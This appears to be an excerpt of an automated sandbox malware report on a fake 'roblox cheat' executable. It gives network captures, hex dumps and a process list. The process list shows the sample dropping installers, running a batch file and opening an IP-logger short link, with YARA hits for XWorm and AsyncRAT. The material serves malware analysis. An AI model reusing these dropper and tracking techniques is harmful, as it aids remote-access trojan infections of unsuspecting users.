2024-07-29 22:54:46 UTC | 480 | OUT | POST /report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9B HTTP/1.1
Host: a.nel.cloudflare.com
Connection: keep-alive
Content-Length: 422
Content-Type: application/reports+json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-07-29 22:54:46 UTC | 422 | OUT | Data: [{"age":0,"body":{"elapsed_time":752,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"104.21.4.208","status_code":403,"type":"http.error"},"type":"network-error","url":"https://cd
2024-07-29 22:54:46 UTC | 168 | IN | HTTP/1.1 200 OK
Content-Length: 0
date: Mon, 29 Jul 2024 22:54:46 GMT
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49727 | 88.212.201.198 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:46 UTC | 706 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
Host: counter.yadro.ru
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://2no.co/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: FTID=1cg1sr1pFper1cg1sr001FMX
2024-07-29 22:54:46 UTC | 481 | IN | HTTP/1.1 200 OK
Server: nginx/1.17.9
Date: Mon, 29 Jul 2024 22:54:46 GMT
Content-Type: image/gif
Content-Length: 445
Connection: close
Expires: Sun, 30 Jul 2023 21:00:00 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: VID=2DNPIG0nbdur1cg1ss001FSz; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=86400
2024-07-29 22:54:46 UTC | 445 | IN | Data: GIF87a image (445 bytes of binary image data, omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49730 | 184.28.90.27 | 443 | (not recorded) | (not recorded)
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:47 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
2024-07-29 22:54:47 UTC | 467 | IN | HTTP/1.1 200 OK
Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
Content-Type: application/octet-stream
ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
Last-Modified: Tue, 16 May 2017 22:58:00 GMT
Server: ECAcc (chd/073B)
X-CID: 11
X-Ms-ApiVersion: Distribute 1.2
X-Ms-Region: prod-eus-z1
Cache-Control: public, max-age=202098
Date: Mon, 29 Jul 2024 22:54:47 GMT
Connection: close
X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49731 | 104.21.4.208 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:47 UTC | 577 | OUT | GET /favicon.ico HTTP/1.1
Host: cdn.iplogger.org
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://2no.co/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-07-29 22:54:47 UTC | 751 | IN | HTTP/1.1 200 OK
Date: Mon, 29 Jul 2024 22:54:47 GMT
Content-Type: image/x-icon
Content-Length: 2833
Connection: close
last-modified: Tue, 07 Jun 2022 11:44:38 GMT
etag: "629f3a26-b11"
strict-transport-security: max-age=31536000
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 6365
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlE%2B6qB6X7ozUoxmrFrzrXnvmROT047LP6h4QrtpI4JgpQp73Na0j7Gm3uMsWw3tBq1axJF67Ixn0IvWpeyNirqpjoAbHEycXcSrjg46YORsWZ4fE8lQNYJX8qw9YugLBIfZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ab0b15a8ab24385-EWR
alt-svc: h3=":443"; ma=86400
2024-07-29 22:54:47 UTC | 618 | IN | Data: PNG image, first chunk (618 bytes of binary image data, omitted)
2024-07-29 22:54:47 UTC | 1369 | IN | Data: PNG image, continued (1369 bytes of binary image data, omitted)
2024-07-29 22:54:47 UTC | 846 | IN | Data: PNG image, continued (846 bytes of binary image data, omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49732 | 88.212.201.198 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:47 UTC | 510 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
Host: counter.yadro.ru
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: FTID=1cg1sr1pFper1cg1sr001FMX; VID=2DNPIG0nbdur1cg1ss001FSz
2024-07-29 22:54:48 UTC | 459 | IN | HTTP/1.1 200 OK
Server: nginx/1.17.9
Date: Mon, 29 Jul 2024 22:54:48 GMT
Content-Type: image/gif
Content-Length: 445
Connection: close
Expires: Sun, 30 Jul 2023 21:00:00 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=86400
2024-07-29 22:54:48 UTC | 445 | IN | Data: GIF87a image (445 bytes of binary image data, omitted)


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.949733104.21.4.2084437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:48 UTC351OUTGET /favicon.ico HTTP/1.1
                                                                                Host: cdn.iplogger.org
                                                                                Connection: keep-alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: empty
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                 2024-07-29 22:54:48 UTC | 759               | IN        | HTTP/1.1 200 OK
                                                                                Date: Mon, 29 Jul 2024 22:54:48 GMT
                                                                                Content-Type: image/x-icon
                                                                                Content-Length: 2833
                                                                                Connection: close
                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                etag: "629f3a26-b11"
                                                                                strict-transport-security: max-age=31536000
                                                                                x-frame-options: SAMEORIGIN
                                                                                Cache-Control: max-age=14400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 6366
                                                                                Accept-Ranges: bytes
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LlKuTq5MIOzsT7q0gS7PJe7XWG%2Bwchx4rrpXe5H1kfljJ%2FVD3t8UUuJzvSvcrny8B03yyiD6Kg6oKzkLuDCxfi%2FLYQXIy27lyQYMY9WtqugPo0S%2BcwB1eQROimDuru9%2FFdhA"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ab0b15ebc191a1b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-07-29 22:54:48 UTC610INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                2024-07-29 22:54:48 UTC1369INData Raw: 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c fb 23 f1 45
                                                                                Data Ascii: x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),#E
                                                                                2024-07-29 22:54:48 UTC854INData Raw: 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61 99 b9 3a 2d
                                                                                Data Ascii: ]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a:-


                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 11         | 192.168.2.9 | 49734       | 184.28.90.27   | 443              |     |
                                                                                 Timestamp               | Bytes transferred | Direction | Data
                                                                                 2024-07-29 22:54:48 UTC | 239               | OUT       | GET /fs/windows/config.json HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                Accept-Encoding: identity
                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                Range: bytes=0-2147483646
                                                                                User-Agent: Microsoft BITS/7.8
                                                                                Host: fs.microsoft.com
                                                                                 2024-07-29 22:54:48 UTC | 515               | IN        | HTTP/1.1 200 OK
                                                                                ApiVersion: Distribute 1.1
                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                Content-Type: application/octet-stream
                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                Server: ECAcc (lpl/EF06)
                                                                                X-CID: 11
                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                X-Ms-Region: prod-weu-z1
                                                                                Cache-Control: public, max-age=202140
                                                                                Date: Mon, 29 Jul 2024 22:54:48 GMT
                                                                                Content-Length: 55
                                                                                Connection: close
                                                                                X-CID: 2
                                                                                2024-07-29 22:54:48 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                 Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 12         | 192.168.2.9 | 60764       | 20.12.23.50    | 443              |     |
                                                                                 Timestamp               | Bytes transferred | Direction | Data
                                                                                 2024-07-29 22:55:19 UTC | 306               | OUT       | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USNpFfLxfLR8zud&MD=tboVBsUh HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                Host: slscr.update.microsoft.com
                                                                                 2024-07-29 22:55:19 UTC | 560               | IN        | HTTP/1.1 200 OK
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                Content-Type: application/octet-stream
                                                                                Expires: -1
                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                MS-CorrelationId: dd266115-2da5-432c-b94c-18d4ab9738c9
                                                                                MS-RequestId: c8f41c42-879e-45b3-9978-e9b8e735b255
                                                                                MS-CV: XwQXl5k/1kSqWqc3.0
                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                X-Content-Type-Options: nosniff
                                                                                Date: Mon, 29 Jul 2024 22:55:19 GMT
                                                                                Connection: close
                                                                                Content-Length: 30005
                                                                                2024-07-29 22:55:19 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                2024-07-29 22:55:19 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                Target ID:0
                                                                                Start time:18:54:24
                                                                                Start date:29/07/2024
                                                                                Path:C:\Users\user\Desktop\roblox cheat.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\roblox cheat.exe"
                                                                                Imagebase:0x910000
                                                                                File size:6'410'752 bytes
                                                                                MD5 hash:6B94734FEAC8EDB9F925385163AD59C9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:18:54:24
                                                                                Start date:29/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe"
                                                                                Imagebase:0xa20000
                                                                                File size:5'720'984 bytes
                                                                                MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:3
                                                                                Start time:18:54:24
                                                                                Start date:29/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
                                                                                Imagebase:0x7ff754540000
                                                                                File size:630'062 bytes
                                                                                MD5 hash:FC411F4D9F4DBA5104CB1549153A8684
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 61%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:18:54:26
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
                                                                                Imagebase:0x7ff6802f0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:18:54:26
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff70f010000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:18:54:36
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:cmd
                                                                                Imagebase:0x7ff6802f0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:7
                                                                                Start time:18:54:36
                                                                                Start date:29/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff70f010000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:18:54:37
                                                                                Start date:29/07/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                                Imagebase:0x7ff6b2cb0000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:12
                                                                                Start time:18:54:39
                                                                                Start date:29/07/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1928,i,13588240422126798521,8416605528282741341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff6b2cb0000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eae3e544fc0c88a27e752672e2fc98ab729e13e68aee0e20f4b534476427e410
                                                                                  • Instruction ID: fcc128346b224c82ef692a98708ac983a61900a952c56c0cf6a02b52412c2caf
                                                                                  • Opcode Fuzzy Hash: eae3e544fc0c88a27e752672e2fc98ab729e13e68aee0e20f4b534476427e410
                                                                                  • Instruction Fuzzy Hash: 5BA2E370C68369CFDBA69F34C8822CAB7F0FF56724B14845ED891AD65DD7324902CB89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 24f4c8e44bc9df20ee4f975f16a89daecbe19f02e239dab181bc933a5f0ddb0a
                                                                                  • Instruction ID: 76712ad67ad3e085b87a40651690a35d16c77e5cc4f5751c1e88b1850153eb86
                                                                                  • Opcode Fuzzy Hash: 24f4c8e44bc9df20ee4f975f16a89daecbe19f02e239dab181bc933a5f0ddb0a
                                                                                  • Instruction Fuzzy Hash: D83268B4A01229CFDBA4DFA9D994B9DBBB1BB49300F1181EAD91DA7354DB305E84CF10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec13edc29c1da0966b93678f08a251d877518ced7ad2c79d770a95aaa8399576
                                                                                  • Instruction ID: 3013a15e6b6551a8f806b24350c7bb1fd3d358183211b40cd757448e3104d89b
                                                                                  • Opcode Fuzzy Hash: ec13edc29c1da0966b93678f08a251d877518ced7ad2c79d770a95aaa8399576
                                                                                  • Instruction Fuzzy Hash: C6D16D31A042058FDB66DFA8D854BAE7BF2FF88300F144529D546AB394DB349C46DBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e765975fe494f2ad97240aacf8422cf36a3c5a3ee71bf30d526f55154af3862e
                                                                                  • Instruction ID: a385b0df823ffb7b88bb41ac292532583c8c17116ee3e1714acdfbcf2a617cf4
